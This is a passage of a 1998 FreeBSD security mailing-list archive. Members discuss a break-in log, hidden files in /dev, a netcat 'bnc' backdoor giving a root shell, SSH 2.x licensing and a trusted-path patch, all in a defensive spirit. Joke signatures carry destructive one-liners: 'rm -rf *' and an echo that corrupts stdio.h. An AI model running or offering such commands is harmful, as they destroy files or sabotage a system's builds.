Nessus is more denial-of-service (indeed, it will take down anything Microsoft-related, and most commercial OSes without patches) and intrusion oriented.

> I think the app should have a (secure) database somewhere on the net to
> check the bug-free popper version number, for example. Or easy automatic
> local database update (by 'mirror' or something).

Then you want ISS scanner.

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
The Internet is busy. Please try again later.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Aug 27 04:38:29 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA28872 for freebsd-security-outgoing; Thu, 27 Aug 1998 04:38:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from gjp.erols.com (alex-va-n008c079.moon.jic.com [206.156.18.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA28867 for ; Thu, 27 Aug 1998 04:38:27 -0700 (PDT) (envelope-from gjp@gjp.erols.com)
Received: from gjp.erols.com (gjp@localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id HAA10513; Thu, 27 Aug 1998 07:36:59 -0400 (EDT) (envelope-from gjp@gjp.erols.com)
X-Mailer: exmh version 2.0.1 12/23/97
To: Wilson MacGyver
cc: security@FreeBSD.ORG
From: "Gary Palmer"
Subject: Re: post breakin log
In-reply-to: Your message of "Thu, 27 Aug 1998 01:38:37 EDT." <199808270538.BAA01341@armitage.cylatech.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 27 Aug 1998 07:36:59 -0400
Message-ID: <10509.904217819@gjp.erols.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Wilson MacGyver wrote in message ID <199808270538.BAA01341@armitage.cylatech.com>:

> From the log, it seems he is very knowledgeable about FreeBSD.
> though I must admit, I don't get why he makes the /dev/sync.
> also, I don't know what the deal is with the bnc* stuff

Where better to hide something than in a directory filled with stuff no-one looks at? And even if they did look at it, they'd never remember if it was there or not before :)

bnc is probably a backdoor program running on a different port

Gary

--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Aug 27 04:46:15 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA29921 for freebsd-security-outgoing; Thu, 27 Aug 1998 04:46:15 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from gjp.erols.com (alex-va-n008c079.moon.jic.com [206.156.18.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA29905 for ; Thu, 27 Aug 1998 04:46:10 -0700 (PDT) (envelope-from gjp@gjp.erols.com)
Received: from gjp.erols.com (gjp@localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id HAA10634; Thu, 27 Aug 1998 07:45:17 -0400 (EDT) (envelope-from gjp@gjp.erols.com)
X-Mailer: exmh version 2.0.1 12/23/97
To: Seppo Kallio
cc: security@FreeBSD.ORG
From: "Gary Palmer"
Subject: Re: post breakin log (Saint/Nessus/?)
In-reply-to: Your message of "Thu, 27 Aug 1998 13:04:01 +0300." <19980827130401.B546@beeblebrox.cc.jyu.fi>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 27 Aug 1998 07:45:16 -0400
Message-ID: <10629.904218316@gjp.erols.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Seppo Kallio wrote in message ID <19980827130401.B546@beeblebrox.cc.jyu.fi>:

> We are managing 10-20 Sun/Linux/FreeBSD nodes at cc,
> AND a lot of University staff have Linux/Sun workstations.

Put the staff machines behind a strong firewall/bastion host so that they can't run `services'. Without services, the machines are impenetrable (unless your firewall box gets hacked). Then you don't have to care what they run, unless you're worried about them hacking each other :)

Gary

--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Aug 27 05:18:17 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA03406 for freebsd-security-outgoing; Thu, 27 Aug 1998 05:18:17 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from speedy.nethampton.com (speedy.nethampton.com [207.252.75.40]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id FAA03390 for ; Thu, 27 Aug 1998 05:18:10 -0700 (PDT) (envelope-from tplatt@nethampton.com)
Date: Thu, 27 Aug 1998 05:18:10 -0700 (PDT)
Received: (qmail 12232 invoked from network); 27 Aug 1998 12:14:56 -0000
Received: from teebee.hamptons.com (HELO ?204.141.112.245?) (204.141.112.245) by speedy.nethampton.com with SMTP; 27 Aug 1998 12:14:56 -0000
X-Sender: tplatt@nethampton.com (Unverified)
Message-Id:
In-Reply-To:
References: <199808270538.BAA01341@armitage.cylatech.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Nicholas Charles Brawn
From: "Timothy R. Platt"
Subject: Re: post breakin log
Cc: security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>On Thu, 27 Aug 1998, Wilson MacGyver wrote:
>
>> Hi guys,
>>
>> My FreeBSD box got hacked about two days ago... yes yes, via the popper.
>> I reinstalled the system, but saved the log. I was looking through to
>> see what he has done. There is some stuff you may find interesting...
>>
>> the log from history follows.
>>
>> From the log, it seems he is very knowledgeable about FreeBSD.
>> though I must admit, I don't get why he makes the /dev/sync.
>> also, I don't know what the deal is with the bnc* stuff

bnc, or bounce, allows people to bounce irc sessions off your server, i.e. they sit at home with their mirc running, connect to your machine which relays to an irc server, thus producing your.compromised.server.com as their hostname on irc. Funny thing is, if you have any decent logging, you can log their IP.

Tim

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Aug 27 09:22:41 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA02751 for freebsd-security-outgoing; Thu, 27 Aug 1998 09:22:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from the.oneinsane.net (gw.oneinsane.net [207.113.133.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA02741; Thu, 27 Aug 1998 09:22:37 -0700 (PDT) (envelope-from insane@the.oneinsane.net)
Received: (from insane@localhost) by the.oneinsane.net (8.9.0/8.9.0) id JAA09715; Thu, 27 Aug 1998 09:21:38 -0700 (PDT)
Message-ID: <19980827092138.B9553@oneinsane.net>
Date: Thu, 27 Aug 1998 09:21:38 -0700
From: "Ron 'The Insane One' Rosson"
To: freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: SSH port
Reply-To: insane@oneinsane.net
Mail-Followup-To: freebsd-ports@freebsd.org, freebsd-security@freebsd.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93i X-Operating-System: FreeBSD the.oneinsane.net 2.2.6-STABLE X-Opinion: What you read here is my IMHO X-Disclaimer: I am a firm believer in RTFM X-WWW: http://www.oneinsane.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a reason why we dont have a port of the ver 2.x ssh. There appears to be an insertion attack in the 1.26 version that we have in our ports. Sorry for the cross psot but theis came to my attention from running some tests on my own machines. TIA Ron -- -------------------------------------------------------- Ron Rosson ... and a UNIX user said ... The InSaNe One rm -rf * insane@oneinsane.net and all was null and void -------------------------------------------------------- It's so nice to be insane, nobody asks you to explain. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 10:00:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA10279 for freebsd-security-outgoing; Thu, 27 Aug 1998 10:00:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.numachi.com (numachi.numachi.com [198.175.254.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id KAA10262 for ; Thu, 27 Aug 1998 10:00:17 -0700 (PDT) (envelope-from reichert@numachi.com) Received: (qmail 29982 invoked by uid 1001); 27 Aug 1998 16:59:23 -0000 Message-ID: <19980827125922.A29892@numachi.com> Date: Thu, 27 Aug 1998 12:59:22 -0400 From: Brian Reichert To: security@FreeBSD.ORG Subject: Re: post breakin log References: <199808270538.BAA01341@armitage.cylatech.com> <1143.904199171@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91i In-Reply-To: <1143.904199171@time.cdrom.com>; from Jordan K. 
Hubbard on Wed, Aug 26, 1998 at 11:26:11PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Aug 26, 1998 at 11:26:11PM -0700, Jordan K. Hubbard wrote: > Watch bugtrax, www.rootshell.org, CERT, etc. I can't find a host called www.rootshell.org. Any pointers? -- Brian 'you Bastard' Reichert reichert@numachi.com 37 Crystal Ave. #303 Current daytime number: (617)-873-4337 Derry NH 03038-1713 USA Intel architecture: the left-hand path To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 10:19:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA12919 for freebsd-security-outgoing; Thu, 27 Aug 1998 10:19:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from nak.myhouse.com (nak.myhouse.com [209.70.45.162]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA12895 for ; Thu, 27 Aug 1998 10:19:18 -0700 (PDT) (envelope-from zoonie@myhouse.com) Received: from localhost (zoonie@localhost) by nak.myhouse.com (8.8.8/8.8.7) with SMTP id NAA02318; Thu, 27 Aug 1998 13:17:31 -0400 (EDT) (envelope-from zoonie@myhouse.com) X-Authentication-Warning: nak.myhouse.com: zoonie owned process doing -bs Date: Thu, 27 Aug 1998 13:17:31 -0400 (EDT) From: zoonie To: Brian Reichert cc: security@FreeBSD.ORG Subject: Re: post breakin log In-Reply-To: <19980827125922.A29892@numachi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org it's www.rootshell.com..... On Thu, 27 Aug 1998, Brian Reichert wrote: > On Wed, Aug 26, 1998 at 11:26:11PM -0700, Jordan K. Hubbard wrote: > > Watch bugtrax, www.rootshell.org, CERT, etc. > > I can't find a host called www.rootshell.org. Any pointers? > > -- > Brian 'you Bastard' Reichert reichert@numachi.com > 37 Crystal Ave. 
> #303                                Current daytime number: (617)-873-4337
> Derry NH 03038-1713 USA             Intel architecture: the left-hand path
>

From owner-freebsd-security Thu Aug 27 10:33:43 1998
Date: Thu, 27 Aug 1998 10:36:45 -0700
From: Sean Harding
Reply-To: Sean Harding
To: Brian Reichert
cc: security@FreeBSD.ORG
Subject: Re: post breakin log
In-Reply-To: <19980827125922.A29892@numachi.com>

On Thu, 27 Aug 1998, Brian Reichert wrote:

> I can't find a host called www.rootshell.org. Any pointers?

www.rootshell.com

Sean

-- 
Sean Harding sharding@oregon.uoregon.edu|"They burn their bridges as they
http://gladstone.uoregon.edu/~sharding/ | go."
Consulting: http://www.efn.org/~seanh   | --Natalie Merchant

From owner-freebsd-security Thu Aug 27 10:34:22 1998
From: Sheldon Hearn
To: insane@oneinsane.net
cc: freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: SSH port
In-reply-to: Your message of "Thu, 27 Aug 1998 09:21:38 MST." <19980827092138.B9553@oneinsane.net>
Date: Thu, 27 Aug 1998 19:32:42 +0200
Message-ID: <27231.904239162@axl.training.iafrica.com>

On Thu, 27 Aug 1998 09:21:38 MST, "Ron 'The Insane One' Rosson" wrote:

> Is there a reason why we don't have a port of the ver 2.x
> ssh.

It may have something to do with the software not being freely
distributable. This is from the LICENSE document in the tarball:

| THERE IS NO WARRANTY OF ANY KIND FOR THIS SOFTWARE. THIS SOFTWARE IS
| FOR NON-COMMERCIAL USE ONLY.
|
| Please contact Data Fellows for
| commercial licensing.

The document goes on to wrap non-commercial use up quite tightly,
including the prohibition for use in administration of educational
systems. You should probably look at the file yourself to be sure you
qualify for a license.

> Sorry for the cross post but this came to my attention from running
> some tests on my own machines.
Your problem, not ours, eh? :-)

Ciao,
Sheldon.

From owner-freebsd-security Thu Aug 27 10:35:08 1998
Message-ID: <19980827193347.56890@deepo.prosa.dk>
Date: Thu, 27 Aug 1998 19:33:47 +0200
From: Philippe Regnauld
To: Brian Reichert
Cc: security@FreeBSD.ORG
Subject: Re: post breakin log
References: <199808270538.BAA01341@armitage.cylatech.com> <1143.904199171@time.cdrom.com> <19980827125922.A29892@numachi.com>
In-Reply-To: <19980827125922.A29892@numachi.com>; from Brian Reichert on Thu, Aug 27, 1998 at 12:59:22PM -0400
Organization: PROSA

Brian Reichert writes:
> On Wed, Aug 26, 1998 at 11:26:11PM -0700, Jordan K. Hubbard wrote:
> > Watch bugtrax, www.rootshell.org, CERT, etc.
>
> I can't find a host called www.rootshell.org. Any pointers?

s/org/com/

-- 
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
The Internet is busy. Please try again later.

From owner-freebsd-security Thu Aug 27 10:40:31 1998
Message-Id: <199808271738.KAA26294@burka.rdy.com>
Subject: Re: SSH port
In-Reply-To: <19980827092138.B9553@oneinsane.net> from "Ron 'The Insane One' Rosson" at "Aug 27, 1998 9:21:38 am"
To: insane@oneinsane.net
Date: Thu, 27 Aug 1998 10:38:51 -0700 (PDT)
Cc: freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Organization: HackerDome
Reply-To: dima@best.net
From: dima@best.net (Dima Ruban)

I'll work on this later today.

Ron 'The Insane One' Rosson writes:
> Is there a reason why we don't have a port of the ver 2.x
> ssh. There appears to be an insertion attack in the 1.26
> version that we have in our ports. Sorry for the cross
> post but this came to my attention from running some tests
> on my own machines.
> TIA
> Ron
> --
> --------------------------------------------------------
> Ron Rosson                 ... and a UNIX user said ...
> The InSaNe One             rm -rf *
> insane@oneinsane.net       and all was null and void
> --------------------------------------------------------
> It's so nice to be insane, nobody asks you to explain.
>

-- 
dima

From owner-freebsd-security Thu Aug 27 10:45:07 1998
From: Sheldon Hearn
To: Brian Reichert
cc: security@FreeBSD.ORG
Subject: Re: post breakin log
In-reply-to: Your message of "Thu, 27 Aug 1998 12:59:22 -0400." <19980827125922.A29892@numachi.com>
Date: Thu, 27 Aug 1998 19:42:26 +0200
Message-ID: <27274.904239746@axl.training.iafrica.com>

On Thu, 27 Aug 1998 12:59:22 -0400, Brian Reichert wrote:

> I can't find a host called www.rootshell.org. Any pointers?

Try www.rootshell.com ?

Ciao,
Sheldon.
From owner-freebsd-security Thu Aug 27 11:24:22 1998
Message-ID: <19980827182323.6798.qmail@hyperreal.org>
Date: Thu, 27 Aug 1998 11:16:01 -0700
To: Wilson MacGyver , security@FreeBSD.ORG
From: Brian Behlendorf
Subject: Re: post breakin log
In-Reply-To: <199808270538.BAA01341@armitage.cylatech.com>

At 01:38 AM 8/27/98 -0400, Wilson MacGyver wrote:
>the log from history follows.

Is there a fool-proof way to get user histories like this? I got one once
only because the cracker was lame enough to forget to delete his
.bash_history file. Presuming root isn't compromised of course...

	Brian

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
"Common sense is the collection of prejudices   | brian@apache.org
 acquired by the age of eighteen."
                           - Einstein            | brian@hyperreal.org

From owner-freebsd-security Thu Aug 27 11:41:36 1998
Message-ID: <19980827113954.A11893@oneinsane.net>
Date: Thu, 27 Aug 1998 11:39:54 -0700
From: "Ron 'The Insane One' Rosson"
To: Sheldon Hearn
Cc: dima@best.net, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: SSH port
Reply-To: insane@oneinsane.net
References: <19980827092138.B9553@oneinsane.net> <27231.904239162@axl.training.iafrica.com>
In-Reply-To: <27231.904239162@axl.training.iafrica.com>; from Sheldon Hearn on Thu, Aug 27, 1998 at 07:32:42PM +0200

On Thu, Aug 27, 1998 at 07:32:42PM +0200, Sheldon Hearn wrote:
>
>
> On Thu, 27 Aug 1998 09:21:38 MST, "Ron 'The Insane One' Rosson" wrote:
>
> > Is there a reason why we don't have a port of the ver 2.x
> > ssh.
>
> It may have something to do with the software not being freely
> distributable.
> This is from the LICENSE document in the tarball:
>
> | THERE IS NO WARRANTY OF ANY KIND FOR THIS SOFTWARE. THIS SOFTWARE IS
> | FOR NON-COMMERCIAL USE ONLY.
> |
> | Please contact Data Fellows for
> | commercial licensing.
>
> The document goes on to wrap non-commercial use up quite tightly,
> including the prohibition for use in administration of educational
> systems. You should probably look at the file yourself to be sure you
> qualify for a license.

Thanx for showing my ignorance. I failed to dig that deep into it. My
apologies for that.

After this post I am going to bear down and read the license. The thing that
gets me is that the previous versions before it have always been 'freely
distributable'. This is starting to smell like the same thing
that happened with Xfree. I could be wrong. If anyone has nessus installed
on their system and ssh also you will pick up on the possibility of an
insecure ssh. Again I could be wrong and jumping in the wrong direction
but it kinda rattled my cage.

>
> > Sorry for the cross post but this came to my attention from running
> > some tests on my own machines.
>
> Your problem, not ours, eh? :-)
>
NP..
TIA
Ron

-- 
--------------------------------------------------------
Ron Rosson                 ... and a UNIX user said ...
The InSaNe One             rm -rf *
insane@oneinsane.net       and all was null and void
--------------------------------------------------------
It's so nice to be insane, nobody asks you to explain.
From owner-freebsd-security Thu Aug 27 11:48:02 1998
Message-Id: <199808271846.LAA00887@burka.rdy.com>
Subject: Re: SSH port
In-Reply-To: <19980827113954.A11893@oneinsane.net> from "Ron 'The Insane One' Rosson" at "Aug 27, 1998 11:39:54 am"
To: insane@oneinsane.net
Date: Thu, 27 Aug 1998 11:46:40 -0700 (PDT)
Cc: axl@iafrica.com, dima@best.net, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Organization: HackerDome
Reply-To: dima@best.net
From: dima@best.net (Dima Ruban)

Grrr, I just went through the license. Sucks.
Btw, I was under impression that 1.26 has a fix for the insertion attack...

Ron 'The Insane One' Rosson writes:
> On Thu, Aug 27, 1998 at 07:32:42PM +0200, Sheldon Hearn wrote:
> >
> >
> > On Thu, 27 Aug 1998 09:21:38 MST, "Ron 'The Insane One' Rosson" wrote:
> >
> > > Is there a reason why we don't have a port of the ver 2.x
> > > ssh.
> >
> > It may have something to do with the software not being freely
> > distributable. This is from the LICENSE document in the tarball:
> >
> > | THERE IS NO WARRANTY OF ANY KIND FOR THIS SOFTWARE. THIS SOFTWARE IS
> > | FOR NON-COMMERCIAL USE ONLY.
> > |
> > | Please contact Data Fellows for
> > | commercial licensing.
> >
> > The document goes on to wrap non-commercial use up quite tightly,
> > including the prohibition for use in administration of educational
> > systems. You should probably look at the file yourself to be sure you
> > qualify for a license.
>
> Thanx for showing my ignorance. I failed to dig that deep into it. My
> apologies for that.
>
> After this post I am going to bear down and read the license. The thing that
> gets me is that the previous versions before it have always been 'freely
> distributable'. This is starting to smell like the same thing
> that happened with Xfree. I could be wrong. If anyone has nessus installed
> on their system and ssh also you will pick up on the possibility of an
> insecure ssh. Again I could be wrong and jumping in the wrong direction
> but it kinda rattled my cage.
>
> >
> > > Sorry for the cross post but this came to my attention from running
> > > some tests on my own machines.
> >
> > Your problem, not ours, eh? :-)
> >
> NP..
> TIA
> Ron
>
> --
> --------------------------------------------------------
> Ron Rosson                 ... and a UNIX user said ...
> The InSaNe One             rm -rf *
> insane@oneinsane.net       and all was null and void
> --------------------------------------------------------
> It's so nice to be insane, nobody asks you to explain.
>

-- 
dima

From owner-freebsd-security Thu Aug 27 11:54:34 1998
Message-ID: <19980827115247.B11893@oneinsane.net>
Date: Thu, 27 Aug 1998 11:52:47 -0700
From: "Ron 'The Insane One' Rosson"
To: dima@best.net
Cc: axl@iafrica.com, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: SSH port
Reply-To: insane@oneinsane.net
References: <19980827113954.A11893@oneinsane.net> <199808271846.LAA00887@burka.rdy.com>
In-Reply-To: <199808271846.LAA00887@burka.rdy.com>; from Dima Ruban on Thu, Aug 27, 1998 at 11:46:40AM -0700

On Thu, Aug 27, 1998 at 11:46:40AM -0700, Dima Ruban wrote:
> Grrr, I just went through the license. Sucks.
> Btw, I was under impression that 1.26 has a fix for the insertion attack...

If you find the fix for the assertion let me know.. I would like to get this
one headache cleared up. I love my ssh.
>
> Ron 'The Insane One' Rosson writes:
> > On Thu, Aug 27, 1998 at 07:32:42PM +0200, Sheldon Hearn wrote:
> > >
> > >
> > > On Thu, 27 Aug 1998 09:21:38 MST, "Ron 'The Insane One' Rosson" wrote:
> > >
> > > > Is there a reason why we don't have a port of the ver 2.x
> > > > ssh.
> > >
> > > It may have something to do with the software not being freely
> > > distributable. This is from the LICENSE document in the tarball:
> > >
> > > | THERE IS NO WARRANTY OF ANY KIND FOR THIS SOFTWARE. THIS SOFTWARE IS
> > > | FOR NON-COMMERCIAL USE ONLY.
> > > |
> > > | Please contact Data Fellows for
> > > | commercial licensing.
> > >
> > > The document goes on to wrap non-commercial use up quite tightly,
> > > including the prohibition for use in administration of educational
> > > systems. You should probably look at the file yourself to be sure you
> > > qualify for a license.
> >
> > Thanx for showing my ignorance. I failed to dig that deep into it. My
> > apologies for that.
> >
> > After this post I am going to bear down and read the license. The thing that
> > gets me is that the previous versions before it have always been 'freely
> > distributable'. This is starting to smell like the same thing
> > that happened with Xfree. I could be wrong. If anyone has nessus installed
> > on their system and ssh also you will pick up on the possibility of an
> > insecure ssh. Again I could be wrong and jumping in the wrong direction
> > but it kinda rattled my cage.
> >
> > >
> > > > Sorry for the cross post but this came to my attention from running
> > > > some tests on my own machines.
> > >
> > > Your problem, not ours, eh? :-)
> > >
> > NP..

TIA
Ron

-- 
--------------------------------------------------------
Ron Rosson                 ... and a UNIX user said ...
The InSaNe One             rm -rf *
insane@oneinsane.net       and all was null and void
--------------------------------------------------------
It's so nice to be insane, nobody asks you to explain.
From owner-freebsd-security Thu Aug 27 12:09:57 1998
Date: Thu, 27 Aug 1998 12:08:41 -0700 (PDT)
From: "Jan B. Koum "
To: Gary Palmer
cc: Wilson MacGyver , security@FreeBSD.ORG
Subject: Re: post breakin log
In-Reply-To: <10509.904217819@gjp.erols.com>

Arggh! I just remembered. Gary is correct. If you download netcat it comes
with some scripts, bnc is one of them. It will listen on a port and upon
connect will drop you into a shell as root. Please do:

# netstat -an | grep LIST

and check to make sure you know what all the ports are. If I were you I'd
re-install since who knows what you've got going with crontab, at, mail
aliases, etc.

-- Yan

www.best.com/~jkb/
Unix users of the world unite: www.{free,open,net}bsd.org | www.linux.org |
www.apache.org | www.perl.com
"Turn up the lights, I don't want to go home in the dark."

On Thu, 27 Aug 1998, Gary Palmer wrote:

>Wilson MacGyver wrote in message ID
><199808270538.BAA01341@armitage.cylatech.com>:
>> From the log, it seems he is very knowledgeable about FreeBSD.
>> though I must admit, I don't get why he makes the /dev/sync.
>> also, I don't know what the deal with the bnc* stuff
>
>Where better to hide something than in a directory filled with stuff no-one
>looks at? And even if they did look at, then they'd never remember if it was
>there or not before :)
>
>bnc is probably a backdoor program running on a different port
>
>Gary
>--
>Gary Palmer                                          FreeBSD Core Team Member
>FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info
>

From owner-freebsd-security Thu Aug 27 12:17:44 1998
Message-Id: <199808271916.MAA01652@burka.rdy.com>
Subject: Re: SSH port
In-Reply-To: <19980827115247.B11893@oneinsane.net> from "Ron 'The Insane One' Rosson" at "Aug 27, 1998 11:52:47 am"
To: insane@oneinsane.net
Date: Thu, 27 Aug 1998 12:16:03 -0700 (PDT)
Cc: dima@best.net, axl@iafrica.com, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Organization: HackerDome
Reply-To: dima@best.net
From: dima@best.net (Dima Ruban)

Ron 'The Insane One' Rosson
writes:
> On Thu, Aug 27, 1998 at 11:46:40AM -0700, Dima Ruban wrote:
> > Grrr, I just went through the license. Sucks.
> > Btw, I was under impression that 1.26 has a fix for the insertion attack...
>
> If you find the fix for the assertion let me know.. I would like to get this
> one headache cleared up. I love my ssh.
>

Well, from ChangeLog of 1.2.26 version:

Tue Jul  7 22:38:41 1998  Tero Kivinen
	[skipped]
	* Updated deattack code to new version (fixes some bug in check_crc
	  function. New code from CORE SDI S.A., Buenos Aires, Argentina.

Thu Jun 11 01:05:28 1998  Tero Kivinen
	[skipped]
	* Added crc-fix detection code from CORE SDI S.A., Buenos Aires,
	  Argentina. See their security announcement for more information.

Or are you talking about something else?

-- 
dima

From owner-freebsd-security Thu Aug 27 12:24:05 1998
Date: Thu, 27 Aug 1998 15:23:20 -0400 (EDT)
From: Mike Holling
To: "Ron 'The Insane One' Rosson"
cc: Sheldon Hearn , dima@best.net, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: SSH port
In-Reply-To: <19980827113954.A11893@oneinsane.net>

> After this post I am going to bear down and read
> the license. The thing that
> gets me is that the previous versions before it have always been 'freely
> distributable'. This is starting to smell like the same thing
> that happened with Xfree. I could be wrong. If anyone has nessus installed
> on their system and ssh also you will pick up on the possibility of an
> insecure ssh. Again I could be wrong and jumping in the wrong direction
> but it kinda rattled my cage.

I believe the 2.x branch is a complete rewrite of the code, done by
DataFellows. It's essentially a different codebase done by different people.

- Mike

From owner-freebsd-security Thu Aug 27 12:45:15 1998
From: Niall Smart
Message-Id: <199808271937.UAA01055@indigo.ie>
Date: Thu, 27 Aug 1998 20:37:16 +0000
In-Reply-To: ; Nicholas Charles Brawn
Reply-To: rotel@indigo.ie
To: Nicholas Charles Brawn , freebsd-security@FreeBSD.ORG
Subject: Re: trusted path execution patch

On Aug 26,  2:32am, Nicholas Charles Brawn wrote:
} Subject: trusted path execution patch
> For those not familiar with route's patch (Phrack 52, article 6), it
> limits the execution of binaries to those in directories designated as
> "trusted".
> That being (in this case), those that aren't writable by
> group or other, and are owned by either root, bin, or have the gid of a
> "trusted" group.

So are you going to audit all those utilities in the trusted path for
buffer overflows?

Niall

-- 
Niall Smart, rotel@indigo.ie.
Amaze your friends and annoy your enemies:
echo '#define if(x) if (!(x))' >> /usr/include/stdio.h

From owner-freebsd-security Thu Aug 27 12:49:19 1998
From: "Lutz Albers"
To: "Brian Reichert" ,
Subject: RE: post breakin log
Date: Thu, 27 Aug 1998 19:40:58 +0200
Message-ID: <000b01bdd1e1$d97ebb10$ca2aa8c0@ripley.tavari.muc.de>
In-Reply-To: <19980827125922.A29892@numachi.com>

> On Wed, Aug 26, 1998 at 11:26:11PM -0700, Jordan K. Hubbard wrote:
> > Watch bugtrax, www.rootshell.org, CERT, etc.
>
> I can't find a host called www.rootshell.org. Any pointers?

Because it's called www.rootshell.com :-) ?

-- 
Lutz Albers, lutz@muc.de, pgp key available from
Do not take life too seriously, you will never get out of it alive.

From owner-freebsd-security Thu Aug 27 13:13:35 1998
Message-Id: <199808272011.WAA15852@gratis.grondar.za>
To: dima@best.net
cc: insane@oneinsane.net, axl@iafrica.com, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: SSH port
Date: Thu, 27 Aug 1998 22:11:06 +0200
From: Mark Murray

wrote:
> Grrr, I just went through the license. Sucks.
> Btw, I was under impression that 1.26 has a fix for the insertion attack...

1.25 has this.

2.n is the encumbered version.
M
--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Thu Aug 27 13:14:56 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA20311 for freebsd-security-outgoing; Thu, 27 Aug 1998 13:14:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA20241; Thu, 27 Aug 1998 13:14:34 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id NAA02376; Thu, 27 Aug 1998 13:13:14 -0700 (PDT)
Message-Id: <199808272013.NAA02376@burka.rdy.com>
Subject: Re: SSH port
In-Reply-To: <199808272011.WAA15852@gratis.grondar.za> from Mark Murray at "Aug 27, 1998 10:11: 6 pm"
To: mark@grondar.za (Mark Murray)
Date: Thu, 27 Aug 1998 13:13:13 -0700 (PDT)
Cc: dima@best.net, insane@oneinsane.net, axl@iafrica.com, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
X-Class: Fast Organization: HackerDome Reply-To: dima@best.net
From: dima@best.net (Dima Ruban)
X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Mark Murray writes:
